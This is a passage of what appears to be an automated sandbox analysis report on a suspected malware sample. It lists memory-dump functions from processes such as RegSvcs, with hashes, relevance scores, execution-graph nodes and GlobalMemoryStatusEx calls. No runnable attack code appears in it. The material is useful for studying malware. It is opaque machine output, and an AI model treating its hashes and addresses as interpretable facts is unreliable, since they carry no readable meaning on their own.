                                                                                                          • Opcode ID: 5bf1a7e0d2a292bfc1dd7113ea4e8d9092f7936b23f21ef0f21060a533d0c133
                                                                                                          • Instruction ID: 55c8b4446a911dc7a9633e1902e1d8d75309951c8e9b403d827e608f1540c743
                                                                                                          • Opcode Fuzzy Hash: 5bf1a7e0d2a292bfc1dd7113ea4e8d9092f7936b23f21ef0f21060a533d0c133
                                                                                                          • Instruction Fuzzy Hash: C7214971504280EFCB01EF15C5C0B2ABBA6FB84314F34C56DDA494B295CB36D846CA71
                                                                                                          Function 00DED005 Relevance: .1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1821488540.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_ded000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7b2eaf60a358a1bccf55cadfe03702151b725111d50d13a579937db72dd96b73
                                                                                                          • Instruction ID: 543c8db8f59f5abded5555657df3c4dc7e25761069327819ba6ebe8dff1280f3
                                                                                                          • Opcode Fuzzy Hash: 7b2eaf60a358a1bccf55cadfe03702151b725111d50d13a579937db72dd96b73
                                                                                                          • Instruction Fuzzy Hash: 71215E755093C08FDB12DF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                                                          Function 00ADD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1820046682.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_add000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                          • Instruction ID: 44c1b3bf650aa77bfe164641477418ad43885590b909cdbd78e65f436b67e611
                                                                                                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                          • Instruction Fuzzy Hash: 1C11D376504280DFCB16CF14D5C4B16BF71FB94318F24C6AAD84A0B756C336D85ACBA1
                                                                                                          Function 00ADD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1820046682.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_add000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                          • Instruction ID: aeaa552d8b3e9efcb0839fa664057d88822349d3a2b36e64df06b4a584ebf931
                                                                                                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                          • Instruction Fuzzy Hash: 5111D3B6504240DFDB16CF14D5C4B16BF71FB94324F24C6AAD90A0B756C33AE85ACBA1
                                                                                                          Function 00DED1CF Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1821488540.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_ded000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction ID: 7193a001b3aff324f1d50d826aba93b0f8b3ac83b6a3d23c610e9eb616671cca
                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction Fuzzy Hash: 0B11BB75504280DFCB02DF10C5C4B15BBA2FB84314F28C6AAD9494B296C33AD80ACB61
                                                                                                          Function 00ADD759 Relevance: .0, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1820046682.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_add000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e476c82622f5b3ad4aa4e62481af78396d2ae7d4b22410751868eb79ef9ac406
                                                                                                          • Instruction ID: bb58163e0db692f8189b3139c286c99dc7ac62d923dd1c864019a573c2f8360c
                                                                                                          • Opcode Fuzzy Hash: e476c82622f5b3ad4aa4e62481af78396d2ae7d4b22410751868eb79ef9ac406
                                                                                                          • Instruction Fuzzy Hash: 6E01A2710083409AE7108B6ADD84B67BFE8EF51724F18C9ABED0A4A396C279DC40C6B1
                                                                                                          Function 0A5502D0 Relevance: .0, Instructions: 42COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1837984375.000000000A550000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A550000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_a550000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8fc87af2e9161a1f0f4337be499830f399d3668e3c4260149673c1f4be1ace33
                                                                                                          • Instruction ID: bebb86c4c3740764f3832b4538888692cf20daab73c533f143790336f6e3ade0
                                                                                                          • Opcode Fuzzy Hash: 8fc87af2e9161a1f0f4337be499830f399d3668e3c4260149673c1f4be1ace33
                                                                                                          • Instruction Fuzzy Hash: 1F010870D04259DFCB40DFB5D858BBEBBF0BB4A302F0584AAA424B3291DB784A40DF54
                                                                                                          Function 0A5502CF Relevance: .0, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1837984375.000000000A550000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A550000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_a550000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5234231a428eb80cc1d45f8358dce85005a8de1468f0b186b63673a3e087cad2
                                                                                                          • Instruction ID: 51e4c72db40690d8054e592fe3a07457d79a72e28ee525a9fbb133befdd7a96c
                                                                                                          • Opcode Fuzzy Hash: 5234231a428eb80cc1d45f8358dce85005a8de1468f0b186b63673a3e087cad2
                                                                                                          • Instruction Fuzzy Hash: F3010470904259DFCB409FB4D858BBDBBB0BB0A302F0584AAA824A7291DB344A40DB54
                                                                                                          Function 0A5502C2 Relevance: .0, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1837984375.000000000A550000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A550000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_a550000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 55f8167c9720d3ea9646db3f79cdb2ff7a5c5542bce8e290013a8f270727ea0d
                                                                                                          • Instruction ID: a585d60fbfbdd48ffb2c42218a4dc259698b9abf355e0764733bd132c8f076bf
                                                                                                          • Opcode Fuzzy Hash: 55f8167c9720d3ea9646db3f79cdb2ff7a5c5542bce8e290013a8f270727ea0d
                                                                                                          • Instruction Fuzzy Hash: 5CF01D34908259DFC7018F71D868BFDBBB0FB46302F1544D6E855B7291C6344B84DB14
                                                                                                          Function 00ADD758 Relevance: .0, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1820046682.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_add000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7b578dfcf737a57ee2c54dbe7af6bc3f366e928726f866de1c70aeb79f4558b1
                                                                                                          • Instruction ID: 9627a4c1fce5dc5aa1c9a73e298f6954efd3071ac387304c4affd7c6a33705c3
                                                                                                          • Opcode Fuzzy Hash: 7b578dfcf737a57ee2c54dbe7af6bc3f366e928726f866de1c70aeb79f4558b1
                                                                                                          • Instruction Fuzzy Hash: EAF062714043449EE7148B1ADD88B62FFA8EF51724F18C45AED094E396C2799C44CAB1

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:11.2%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:17
                                                                                                          Total number of Limit Nodes:4
                                                                                                          execution_graph 23200 16d0848 23201 16d084e 23200->23201 23202 16d091b 23201->23202 23204 16d1390 23201->23204 23206 16d1393 23204->23206 23205 16d14a0 23205->23201 23206->23205 23208 16d7f98 23206->23208 23209 16d7fa2 23208->23209 23210 16d7fbc 23209->23210 23213 6d2fab0 23209->23213 23217 6d2faab 23209->23217 23210->23206 23214 6d2fac5 23213->23214 23215 6d2fcda 23214->23215 23216 6d2fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 23214->23216 23215->23210 23216->23214 23219 6d2faae 23217->23219 23218 6d2fcda 23218->23210 23219->23218 23220 6d2fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 23219->23220 23220->23219

                                                                                                          Executed Functions

                                                                                                          Function 06D230D0 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 6d230d0-6d230f1 1 6d230f3-6d230f6 0->1 2 6d23897-6d2389a 1->2 3 6d230fc-6d2311b 1->3 4 6d238c0-6d238c2 2->4 5 6d2389c-6d238bb 2->5 12 6d23134-6d2313e 3->12 13 6d2311d-6d23120 3->13 7 6d238c4 4->7 8 6d238c9-6d238cc 4->8 5->4 7->8 8->1 10 6d238d2-6d238db 8->10 18 6d23144-6d23153 12->18 13->12 15 6d23122-6d23132 13->15 15->18 126 6d23155 call 6d238f0 18->126 127 6d23155 call 6d238e8 18->127 19 6d2315a-6d2315f 20 6d23161-6d23167 19->20 21 6d2316c-6d23449 19->21 20->10 42 6d23889-6d23896 21->42 43 6d2344f-6d234fe 21->43 52 6d23500-6d23525 43->52 53 6d23527 43->53 54 6d23530-6d23543 52->54 53->54 57 6d23870-6d2387c 54->57 58 6d23549-6d2356b 54->58 57->43 59 6d23882 57->59 58->57 61 6d23571-6d2357b 58->61 59->42 61->57 62 6d23581-6d2358c 61->62 62->57 63 6d23592-6d23668 62->63 75 6d23676-6d236a6 63->75 76 6d2366a-6d2366c 63->76 80 6d236b4-6d236c0 75->80 81 6d236a8-6d236aa 75->81 76->75 82 6d236c2-6d236c6 80->82 83 6d23720-6d23724 80->83 81->80 82->83 86 6d236c8-6d236f2 82->86 84 6d23861-6d2386a 83->84 85 6d2372a-6d23766 83->85 84->57 84->63 96 6d23774-6d23782 85->96 97 6d23768-6d2376a 85->97 93 6d23700-6d2371d 86->93 94 6d236f4-6d236f6 86->94 93->83 94->93 100 6d23784-6d2378f 96->100 101 6d23799-6d237a4 96->101 97->96 100->101 104 6d23791 100->104 105 6d237a6-6d237ac 101->105 106 6d237bc-6d237cd 101->106 104->101 107 6d237b0-6d237b2 105->107 108 6d237ae 105->108 110 6d237e5-6d237f1 106->110 111 6d237cf-6d237d5 106->111 107->106 108->106 115 6d237f3-6d237f9 110->115 116 6d23809-6d2385a 110->116 112 6d237d7 111->112 113 6d237d9-6d237db 111->113 112->110 113->110 117 6d237fb 115->117 118 6d237fd-6d237ff 115->118 116->84 117->116 118->116 126->19 127->19
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2392861976
                                                                                                          • Opcode ID: 85651206c650e756c3cdea704b9132a01501b0d4d5744f8c2fc26a61ff69e476
                                                                                                          • Instruction ID: 980cabeea051f5b897d4de4dfef278c6c7a0ffe69c236aafd539bad8079a6a6e
                                                                                                          • Opcode Fuzzy Hash: 85651206c650e756c3cdea704b9132a01501b0d4d5744f8c2fc26a61ff69e476
                                                                                                          • Instruction Fuzzy Hash: 74323C30E1061ACBDB14DF74C8945ADF7B6FF99304F1186AAD409AB224EB34ED85CB91
                                                                                                          Function 06D291D0 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 128 6d291d0-6d291f5 129 6d291f7-6d291fa 128->129 130 6d29200-6d29215 129->130 131 6d29ab8-6d29abb 129->131 138 6d29217-6d2921d 130->138 139 6d2922d-6d29243 130->139 132 6d29ae1-6d29ae3 131->132 133 6d29abd-6d29adc 131->133 134 6d29ae5 132->134 135 6d29aea-6d29aed 132->135 133->132 134->135 135->129 137 6d29af3-6d29afd 135->137 141 6d29221-6d29223 138->141 142 6d2921f 138->142 145 6d2924e-6d29250 139->145 141->139 142->139 146 6d29252-6d29258 145->146 147 6d29268-6d292d9 145->147 148 6d2925a 146->148 149 6d2925c-6d2925e 146->149 158 6d29305-6d29321 147->158 159 6d292db-6d292fe 147->159 148->147 149->147 164 6d29323-6d29346 158->164 165 6d2934d-6d29368 158->165 159->158 164->165 170 6d29393-6d293ae 165->170 171 6d2936a-6d2938c 165->171 176 6d293d3-6d293e1 170->176 177 6d293b0-6d293cc 170->177 171->170 178 6d293e3-6d293ec 176->178 179 6d293f1-6d2946b 176->179 177->176 178->137 185 6d294b8-6d294cd 179->185 186 6d2946d-6d2948b 179->186 185->131 190 6d294a7-6d294b6 186->190 191 6d2948d-6d2949c 186->191 190->185 190->186 191->190
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2125118731
                                                                                                          • Opcode ID: 604c2074ab98bf391bf1424e626db8dd4eb94d09b1f9bf170f2001fd0968dafb
                                                                                                          • Instruction ID: 272039ebe3aa6f7a0dc78c130f1677f9fe01c2f025be9cbe1247a7ff14c48669
                                                                                                          • Opcode Fuzzy Hash: 604c2074ab98bf391bf1424e626db8dd4eb94d09b1f9bf170f2001fd0968dafb
                                                                                                          • Instruction Fuzzy Hash: BD912D30F0021A9FDB54DB65D860BAEB3F6EF89208F108569D40DEB344EE75EC468B91
                                                                                                          Function 06D24BE0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 194 6d24be0-6d24c04 195 6d24c06-6d24c09 194->195 196 6d24c2a-6d24c2d 195->196 197 6d24c0b-6d24c25 195->197 198 6d24c33-6d24d2b 196->198 199 6d2530c-6d2530e 196->199 197->196 217 6d24d31-6d24d7e call 6d25488 198->217 218 6d24dae-6d24db5 198->218 200 6d25310 199->200 201 6d25315-6d25318 199->201 200->201 201->195 204 6d2531e-6d2532b 201->204 231 6d24d84-6d24da0 217->231 219 6d24dbb-6d24e2b 218->219 220 6d24e39-6d24e42 218->220 237 6d24e36 219->237 238 6d24e2d 219->238 220->204 235 6d24da2 231->235 236 6d24dab-6d24dac 231->236 235->236 236->218 237->220 238->237
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: fcq$XPcq$\Ocq
                                                                                                          • API String ID: 0-3575482020
                                                                                                          • Opcode ID: e7457dff6d2f01a705950ca1beff33f1eb4a130309efc32b185885f0d27caa07
                                                                                                          • Instruction ID: 75d0263b4901626b0a2ede72bfa0959b93f2b0e02a87555e8e1323f5b7517b13
                                                                                                          • Opcode Fuzzy Hash: e7457dff6d2f01a705950ca1beff33f1eb4a130309efc32b185885f0d27caa07
                                                                                                          • Instruction Fuzzy Hash: 4F617D30F102199FEB559FA8C8547AEBBF6FB88700F208429D50AEB394DB758C45CB91
                                                                                                          Function 06D280F8 Relevance: 2.7, Strings: 2, Instructions: 248COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1008 6d280f8-6d28117 1009 6d28119-6d2811c 1008->1009 1010 6d2811e-6d2813a 1009->1010 1011 6d2813f-6d28142 1009->1011 1010->1011 1012 6d28148-6d28154 1011->1012 1013 6d281ef-6d281f2 1011->1013 1017 6d2815f-6d28161 1012->1017 1015 6d28427-6d28429 1013->1015 1016 6d281f8-6d28207 1013->1016 1018 6d28430-6d28433 1015->1018 1019 6d2842b 1015->1019 1029 6d28226-6d2826a 1016->1029 1030 6d28209-6d28224 1016->1030 1021 6d28163-6d28169 1017->1021 1022 6d28179-6d2817d 1017->1022 1018->1009 1024 6d28439-6d28442 1018->1024 1019->1018 1025 6d2816b 1021->1025 1026 6d2816d-6d2816f 1021->1026 1027 6d2818b 1022->1027 1028 6d2817f-6d28189 1022->1028 1025->1022 1026->1022 1031 6d28190-6d28192 1027->1031 1028->1031 1036 6d28270-6d28281 1029->1036 1037 6d283fb-6d28411 1029->1037 1030->1029 1033 6d28194-6d28197 1031->1033 1034 6d281a9-6d281e2 1031->1034 1033->1024 1034->1016 1051 6d281e4-6d281ee 1034->1051 1043 6d283e6-6d283f5 1036->1043 1044 6d28287-6d282a4 1036->1044 1037->1015 1043->1036 1043->1037 1044->1043 1052 6d282aa-6d283a0 call 6d26620 1044->1052 1076 6d283a2-6d283ac 1052->1076 1077 6d283ae 1052->1077 1078 6d283b3-6d283b5 1076->1078 1077->1078 1078->1043 1079 6d283b7-6d283bc 1078->1079 1080 6d283ca 1079->1080 1081 6d283be-6d283c8 1079->1081 1082 6d283cf-6d283d1 1080->1082 1081->1082 1082->1043 1083 6d283d3-6d283df 1082->1083 1083->1043
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q
                                                                                                          • API String ID: 0-355816377
                                                                                                          • Opcode ID: d515745bcbbdd467e6d657990b021304395878bf3e84c08a8fb9e6f7cc66658e
                                                                                                          • Instruction ID: b5b9dd66dca451ed3ea169505b42489b47d7e5ed4e6bb80c04bfd66a7b0e8782
                                                                                                          • Opcode Fuzzy Hash: d515745bcbbdd467e6d657990b021304395878bf3e84c08a8fb9e6f7cc66658e
                                                                                                          • Instruction Fuzzy Hash: 0891AE30B002168FDB55DF79D94066EB3A6FF98309F108529D405DB394EB74EC8ACB91
                                                                                                          Function 06D291CB Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1181 6d291cb-6d291f5 1182 6d291f7-6d291fa 1181->1182 1183 6d29200-6d29215 1182->1183 1184 6d29ab8-6d29abb 1182->1184 1191 6d29217-6d2921d 1183->1191 1192 6d2922d-6d29243 1183->1192 1185 6d29ae1-6d29ae3 1184->1185 1186 6d29abd-6d29adc 1184->1186 1187 6d29ae5 1185->1187 1188 6d29aea-6d29aed 1185->1188 1186->1185 1187->1188 1188->1182 1190 6d29af3-6d29afd 1188->1190 1194 6d29221-6d29223 1191->1194 1195 6d2921f 1191->1195 1198 6d2924e-6d29250 1192->1198 1194->1192 1195->1192 1199 6d29252-6d29258 1198->1199 1200 6d29268-6d292d9 1198->1200 1201 6d2925a 1199->1201 1202 6d2925c-6d2925e 1199->1202 1211 6d29305-6d29321 1200->1211 1212 6d292db-6d292fe 1200->1212 1201->1200 1202->1200 1217 6d29323-6d29346 1211->1217 1218 6d2934d-6d29368 1211->1218 1212->1211 1217->1218 1223 6d29393-6d293ae 1218->1223 1224 6d2936a-6d2938c 1218->1224 1229 6d293d3-6d293e1 1223->1229 1230 6d293b0-6d293cc 1223->1230 1224->1223 1231 6d293e3-6d293ec 1229->1231 1232 6d293f1-6d2946b 1229->1232 1230->1229 1231->1190 1238 6d294b8-6d294cd 1232->1238 1239 6d2946d-6d2948b 1232->1239 1238->1184 1243 6d294a7-6d294b6 1239->1243 1244 6d2948d-6d2949c 1239->1244 1243->1238 1243->1239 1244->1243
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q
                                                                                                          • API String ID: 0-355816377
                                                                                                          • Opcode ID: e69188da1a66aefb0343daf4fa1998d24ead3ec38deb90c4db7cd11b62c4e6a2
                                                                                                          • Instruction ID: 604c4140a63a535a4077978fb45ed25e47c8ceb26e8d3b8cfdc43dcca81fe202
                                                                                                          • Opcode Fuzzy Hash: e69188da1a66aefb0343daf4fa1998d24ead3ec38deb90c4db7cd11b62c4e6a2
                                                                                                          • Instruction Fuzzy Hash: E5513E30B001169FDB54DB75D8A0BAE73FAEB88648F108429C40DDB384EE75EC428B95
                                                                                                          Function 06D24BD0 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1284 6d24bd0-6d24c04 1286 6d24c06-6d24c09 1284->1286 1287 6d24c2a-6d24c2d 1286->1287 1288 6d24c0b-6d24c25 1286->1288 1289 6d24c33-6d24d2b 1287->1289 1290 6d2530c-6d2530e 1287->1290 1288->1287 1308 6d24d31-6d24d7e call 6d25488 1289->1308 1309 6d24dae-6d24db5 1289->1309 1291 6d25310 1290->1291 1292 6d25315-6d25318 1290->1292 1291->1292 1292->1286 1295 6d2531e-6d2532b 1292->1295 1322 6d24d84-6d24da0 1308->1322 1310 6d24dbb-6d24e2b 1309->1310 1311 6d24e39-6d24e42 1309->1311 1328 6d24e36 1310->1328 1329 6d24e2d 1310->1329 1311->1295 1326 6d24da2 1322->1326 1327 6d24dab-6d24dac 1322->1327 1326->1327 1327->1309 1328->1311 1329->1328
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: fcq$XPcq
                                                                                                          • API String ID: 0-936005338
                                                                                                          • Opcode ID: af3b4805a3882c256164e502d980b0a76af422216149aa53cee966647930d41e
                                                                                                          • Instruction ID: aaeaaf0f91e7b136e574ca7a1391d66c5fccd5fef9a37267fb23e7bf871fa7ef
                                                                                                          • Opcode Fuzzy Hash: af3b4805a3882c256164e502d980b0a76af422216149aa53cee966647930d41e
                                                                                                          • Instruction Fuzzy Hash: 21517F70F102199FEB559FA5C854BAEBAF7FFC8700F208529E505AB394DA758C01CB91
                                                                                                          Function 016DEC39 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1332 16dec39-16dec53 1333 16dec7d-16dec93 1332->1333 1334 16dec55-16dec7c 1332->1334 1355 16dec95 call 16dec39 1333->1355 1356 16dec95 call 16ded20 1333->1356 1337 16dec9a-16dec9c 1338 16dec9e-16deca1 1337->1338 1339 16deca2-16ded01 1337->1339 1346 16ded07-16ded94 GlobalMemoryStatusEx 1339->1346 1347 16ded03-16ded06 1339->1347 1351 16ded9d-16dedc5 1346->1351 1352 16ded96-16ded9c 1346->1352 1352->1351 1355->1337 1356->1337
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4156045969.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_16d0000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6037d14e14d240a35a2de15af937a088e6e548d129d5ffa0b3b2cd485066ee8f
                                                                                                          • Instruction ID: 0e80188ba75a874fbd2f36a16586092b66ce0d47ad52bb379c4eaaa8080b4fdc
                                                                                                          • Opcode Fuzzy Hash: 6037d14e14d240a35a2de15af937a088e6e548d129d5ffa0b3b2cd485066ee8f
                                                                                                          • Instruction Fuzzy Hash: BC412072D003599FCB14DFBAE8046DEBFF5AF89210F14856AD908A7351DB349845CBE1
                                                                                                          Function 06D25938 Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1357 6d25938-6d2595c 1358 6d2595e-6d25961 1357->1358 1359 6d25963-6d2596a 1358->1359 1360 6d2596f-6d25972 1358->1360 1359->1360 1361 6d25980-6d25983 1360->1361 1362 6d25974-6d2597b 1360->1362 1363 6d25985-6d25988 1361->1363 1364 6d2598e-6d25b22 1361->1364 1362->1361 1363->1364 1365 6d25c71-6d25c74 1363->1365 1417 6d25c5b-6d25c6e 1364->1417 1418 6d25b28-6d25b2f 1364->1418 1365->1364 1366 6d25c7a-6d25c7d 1365->1366 1368 6d25c87-6d25c8a 1366->1368 1369 6d25c7f-6d25c84 1366->1369 1370 6d25ca4-6d25ca7 1368->1370 1371 6d25c8c-6d25c9d 1368->1371 1369->1368 1373 6d25cc1-6d25cc4 1370->1373 1374 6d25ca9-6d25cba 1370->1374 1377 6d25cc6-6d25cd7 1371->1377 1382 6d25c9f 1371->1382 1376 6d25ce2-6d25ce5 1373->1376 1373->1377 1383 6d25d29-6d25d3c 1374->1383 1384 6d25cbc 1374->1384 1380 6d25d03-6d25d06 1376->1380 1381 6d25ce7-6d25cf8 1376->1381 1377->1362 1390 6d25cdd 1377->1390 1387 6d25d24-6d25d27 1380->1387 1388 6d25d08-6d25d19 1380->1388 1381->1362 1397 6d25cfe 1381->1397 1382->1370 1384->1373 1387->1383 1389 6d25d3f-6d25d41 1387->1389 1388->1362 1398 6d25d1f 1388->1398 1395 6d25d43 1389->1395 1396 6d25d48-6d25d4b 1389->1396 1390->1376 1395->1396 1396->1358 1399 6d25d51-6d25d5a 1396->1399 1397->1380 1398->1387 1419 6d25be3-6d25bea 1418->1419 1420 6d25b35-6d25b68 1418->1420 1419->1417 1421 6d25bec-6d25c1f 1419->1421 1430 6d25b6a 1420->1430 1431 6d25b6d-6d25bae 1420->1431 1433 6d25c21 1421->1433 1434 6d25c24-6d25c51 1421->1434 1430->1431 1442 6d25bb0-6d25bc1 1431->1442 1443 6d25bc6-6d25bcd 1431->1443 1433->1434 1434->1399 1434->1417 1442->1399 1444 6d25bd5-6d25bd7 1443->1444 1444->1399
